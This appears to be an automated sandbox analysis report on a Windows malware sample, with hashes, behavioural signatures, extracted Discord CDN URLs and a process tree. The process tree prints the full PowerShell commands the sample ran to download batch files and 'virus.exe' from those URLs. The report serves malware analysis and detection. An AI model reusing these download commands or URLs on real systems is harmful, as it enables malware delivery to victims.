Analysis
- max time kernel: 118s
- max time network: 125s
- platform: windows7_x64
- resource: win7-20231215-en
- resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
- submitted: 26/01/2024, 11:54
Static task
- static1

Behavioral task
- behavioral1
  Sample: d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
  Resource: win7-20231215-en

Behavioral task
- behavioral2
  Sample: d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
  Resource: win10v2004-20231215-en
General
- Target: d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
- Size: 108KB
- MD5: 5a0002d2a22ceca62c674539b7454ae4
- SHA1: 8aebc5ca26daace2b5cef162500ffe515fc601e1
- SHA256: f240023089aeb390afb771116dcd81d753e1270a573caef7118be24ad3799762
- SHA512: 083792c1e199deaa86fde46b5b788c50a1b8a3b6bed4493d509aaa5d6c75fad4a631e64e0bc717ec13628d7fc3250d92566a12c934e6c04b1ac5452adbe573a7
- SSDEEP: 1536:K7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIflAmOHk1xJ:oq6+ouCpk2mpcWJ0r+QNTBfl9e
Malware Config
Extracted URLs:
- https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3
- https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat
- https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat
- https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat
- https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe
Signatures

- Blocklisted process makes network request (10 IoCs)

  flow  pid   Process
  5     2304  powershell.exe
  6     2304  powershell.exe
  8     2136  powershell.exe
  9     2136  powershell.exe
  11    2836  powershell.exe
  12    2836  powershell.exe
  14    2928  powershell.exe
  15    2928  powershell.exe
  17    1696  powershell.exe
  18    1696  powershell.exe

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

- Suspicious behavior: EnumeratesProcesses (10 IoCs)

  pid   Process
  2304  powershell.exe
  2712  powershell.exe
  2136  powershell.exe
  3024  powershell.exe
  2836  powershell.exe
  2764  powershell.exe
  2928  powershell.exe
  1936  powershell.exe
  1696  powershell.exe
  1788  powershell.exe

- Suspicious use of AdjustPrivilegeToken (10 IoCs)

  description              pid   Process
  Token: SeDebugPrivilege  2304  powershell.exe
  Token: SeDebugPrivilege  2712  powershell.exe
  Token: SeDebugPrivilege  2136  powershell.exe
  Token: SeDebugPrivilege  3024  powershell.exe
  Token: SeDebugPrivilege  2836  powershell.exe
  Token: SeDebugPrivilege  2764  powershell.exe
  Token: SeDebugPrivilege  2928  powershell.exe
  Token: SeDebugPrivilege  1936  powershell.exe
  Token: SeDebugPrivilege  1696  powershell.exe
  Token: SeDebugPrivilege  1788  powershell.exe

- Suspicious use of WriteProcessMemory (34 IoCs)

  description                       pid   Process                                                                   procid_target
  PID 2168 wrote to memory of 2972  2168  d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe  27
  PID 2168 wrote to memory of 2972  2168  d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe  27
  PID 2168 wrote to memory of 2972  2168  d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe  27
  PID 2168 wrote to memory of 2972  2168  d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe  27
  PID 2972 wrote to memory of 2304  2972  cmd.exe                                                                   29
  PID 2972 wrote to memory of 2304  2972  cmd.exe                                                                   29
  PID 2972 wrote to memory of 2304  2972  cmd.exe                                                                   29
  PID 2972 wrote to memory of 2712  2972  cmd.exe                                                                   30
  PID 2972 wrote to memory of 2712  2972  cmd.exe                                                                   30
  PID 2972 wrote to memory of 2712  2972  cmd.exe                                                                   30
  PID 2972 wrote to memory of 2136  2972  cmd.exe                                                                   31
  PID 2972 wrote to memory of 2136  2972  cmd.exe                                                                   31
  PID 2972 wrote to memory of 2136  2972  cmd.exe                                                                   31
  PID 2972 wrote to memory of 3024  2972  cmd.exe                                                                   32
  PID 2972 wrote to memory of 3024  2972  cmd.exe                                                                   32
  PID 2972 wrote to memory of 3024  2972  cmd.exe                                                                   32
  PID 2972 wrote to memory of 2836  2972  cmd.exe                                                                   33
  PID 2972 wrote to memory of 2836  2972  cmd.exe                                                                   33
  PID 2972 wrote to memory of 2836  2972  cmd.exe                                                                   33
  PID 2972 wrote to memory of 2764  2972  cmd.exe                                                                   34
  PID 2972 wrote to memory of 2764  2972  cmd.exe                                                                   34
  PID 2972 wrote to memory of 2764  2972  cmd.exe                                                                   34
  PID 2972 wrote to memory of 2928  2972  cmd.exe                                                                   35
  PID 2972 wrote to memory of 2928  2972  cmd.exe                                                                   35
  PID 2972 wrote to memory of 2928  2972  cmd.exe                                                                   35
  PID 2972 wrote to memory of 1936  2972  cmd.exe                                                                   36
  PID 2972 wrote to memory of 1936  2972  cmd.exe                                                                   36
  PID 2972 wrote to memory of 1936  2972  cmd.exe                                                                   36
  PID 2972 wrote to memory of 1696  2972  cmd.exe                                                                   37
  PID 2972 wrote to memory of 1696  2972  cmd.exe                                                                   37
  PID 2972 wrote to memory of 1696  2972  cmd.exe                                                                   37
  PID 2972 wrote to memory of 1788  2972  cmd.exe                                                                   40
  PID 2972 wrote to memory of 1788  2972  cmd.exe                                                                   40
  PID 2972 wrote to memory of 1788  2972  cmd.exe                                                                   40
Processes (process tree; depth shown in brackets)

[1] C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe"
    - Suspicious use of WriteProcessMemory
    PID: 2168

    [2] C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\68E1.tmp\68E2.tmp\68E3.bat C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe"
        - Suspicious use of WriteProcessMemory
        PID: 2972

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3', 'pixel_sides_very_good.mp3')"
            - Blocklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2304

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3 -OutFile pixel_sides_very_good.mp3"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2712

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat', 'music.bat')"
            - Blocklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2136

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat -OutFile music.bat"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 3024

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat', 'no.bat')"
            - Blocklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2836

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat -OutFile no.bat"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2764

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat', 'DO2.bat')"
            - Blocklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2928

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat -OutFile DO2.bat"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 1936

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe', 'VIRUS.exe')"
            - Blocklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 1696

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe -OutFile VIRUS.exe"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 1788
Network
MITRE ATT&CK Enterprise v15
Downloads

- (path not recorded in the report)
  Filesize: 18KB
  MD5: da14901fbd42e828503cc0f75847af52
  SHA1: db49087447161b0fc6ee882dfc6906d1a9d1b96e
  SHA256: 8c2ff4915c53918275152048cf955f70fa23c531c88bd91f1e9b32c818bb9b7f
  SHA512: 8e8196a15a09f0b18e8d4e8d7d1c43c56c67ff2a32e58dc9746ea8d7a75679d38f255a683ea1c0d013d27a630e06f49f6e365a29cccaa327096669ed8d3d9154

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K4ZS9Z1WFX21BOULULSL.temp
  Filesize: 7KB
  MD5: 57052386a785e7b798274f09230d5923
  SHA1: e91aef4bcac9cf3ad51f3fe88c3650e629c6cf1a
  SHA256: 2c20859ce8ef861aa1e4f854619ee9c4602d753255208b01882c17c8ad19c3e9
  SHA512: 9c7d8fee4fa2b5937abb6e9a97dd3eb21cca5a6204eccf877f62f751abe7b3644a435eb28cc9e252a7f76b5e163da1eba1f12995730211cb990a946c45b1b448